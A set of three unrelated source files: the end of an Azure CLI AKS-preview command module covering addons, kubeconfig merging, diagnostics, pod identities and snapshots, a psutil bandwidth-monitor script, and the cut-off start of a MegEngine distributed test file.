'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
bandwidth-report.py
|
import time
import threading
from datetime import datetime
import psutil
import json
# Feel free to update these values to suit your needs
monitor_interface = 'eth0'
monitor_duration_seconds = 10
class Stats(object):
def __init__(self):
# Bandwidth report file.
self.bw_report_file = 'bandwidth-report.json'
# Thread details
self._thread = None
self._thread_stop = threading.Event()
# Initial network counters
self.if_name = None
try:
ifaces = psutil.net_io_counters(pernic=True)
iface_names = ', '.join(ifaces.keys())
print('Interfaces found: {}'.format(iface_names))
for iface in ifaces.keys():
if monitor_interface == iface:
print('Monitoring Interface: {}'.format(monitor_interface))
self.if_name = iface
break
if self.if_name is not None:
break
if self.if_name is None:
print('Monitoring data over ALL interfaces')
else:
print('Monitoring data over single inteface: {}'.format(self.if_name))
except:
print('Unable to find monitor interface. Using ALL interfaces data for bandwidht calculation')
if self.if_name is not None:
self.start_bytes_sent = psutil.net_io_counters(pernic=True)[self.if_name].bytes_sent
self.start_bytes_recv = psutil.net_io_counters(pernic=True)[self.if_name].bytes_recv
else:
self.start_bytes_sent = psutil.net_io_counters().bytes_sent
self.start_bytes_recv = psutil.net_io_counters().bytes_recv
def update_stats(self):
try:
cpu_usage = psutil.cpu_percent()
mem_usage = psutil.virtual_memory()._asdict()['percent']
# Download BW (MB)
try:
download_bytes = psutil.net_io_counters(pernic=True)[self.if_name].bytes_recv - self.start_bytes_recv
self.start_bytes_recv = psutil.net_io_counters(pernic=True)[self.if_name].bytes_recv
except:
# print("Interface wlp1s0 not found. Switching to All NIC data")
download_bytes = psutil.net_io_counters().bytes_recv - self.start_bytes_recv
self.start_bytes_recv = psutil.net_io_counters().bytes_recv
#self.start_bytes_recv = psutil.net_io_counters(pernic=True)['wlp1s0'].bytes_recv
download_mb = round(download_bytes/(1024.0 * 1024.0), 2)
# Upload BW (MB)
try:
upload_bytes = psutil.net_io_counters(pernic=True)[self.if_name].bytes_sent - self.start_bytes_sent
self.start_bytes_sent = psutil.net_io_counters(pernic=True)[self.if_name].bytes_sent
except:
# print("Interface wlp1s0 not found. Switching to All NIC data")
upload_bytes = psutil.net_io_counters().bytes_sent - self.start_bytes_sent
self.start_bytes_sent = psutil.net_io_counters().bytes_sent
upload_mb = round(upload_bytes/(1024.0 * 1024.0), 2)
print('Last {} seconds Stats: CPU {}%, Mem {}%, Download {}MB, Upload {}MB'.format(monitor_duration_seconds, cpu_usage, mem_usage, download_mb, upload_mb))
# Save the stats
bw_report = {}
try:
with open(self.bw_report_file, 'r') as f:
bw_report = json.load(f)
except:
bw_report = {}
saved_upload_mb = bw_report.get('upload_mb') or 0
saved_download_mb = bw_report.get('download_mb') or 0
last_updated = datetime.now().isoformat()
saved_upload_mb += upload_mb
saved_download_mb += download_mb
bw_report['last_updated'] = last_updated
bw_report['upload_mb'] = round(saved_upload_mb, 2)
bw_report['download_mb'] = round(saved_download_mb, 2)
with open(self.bw_report_file, 'w') as f:
json.dump(bw_report, f, indent=2)
except Exception as ex:
print('Exception occurred while saving stats. ignoring. Ex: {}'.format(ex))
pass
def run(self):
print('CPU, Memory and Bandwidth Stats (every {} seconds)'.format(monitor_duration_seconds))
while(True):
try:
# If closed (^C), then break
if self._thread_stop.is_set():
print('Exiting upload thread.')
break
# Check stats every 10 seconds.
time.sleep(10)
self.update_stats()
except Exception as ex:
print('Exception occurred during stats upload thread, ignoring: {}'.format(ex))
time.sleep(10)
def run_nonblock(self):
print('Starting Bandwidth Stats thread')
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._thread_stop.set()
if __name__ == '__main__':
# To this as a thread from another class, use this code.
# statsObj = Stats()
# statsObj.run_nonblock()
# statsObj._thread.join()
statsObj = Stats()
statsObj.run()
|
test_distributed.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
import numpy as np
import pytest
import megengine as mge
import megengine.distributed as dist
from megengine.core.ops.builtin import CollectiveComm, ParamPackConcat, ParamPackSplit
from megengine.distributed.helper import (
get_device_count_by_fork,
param_pack_concat,
param_pack_split,
)
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
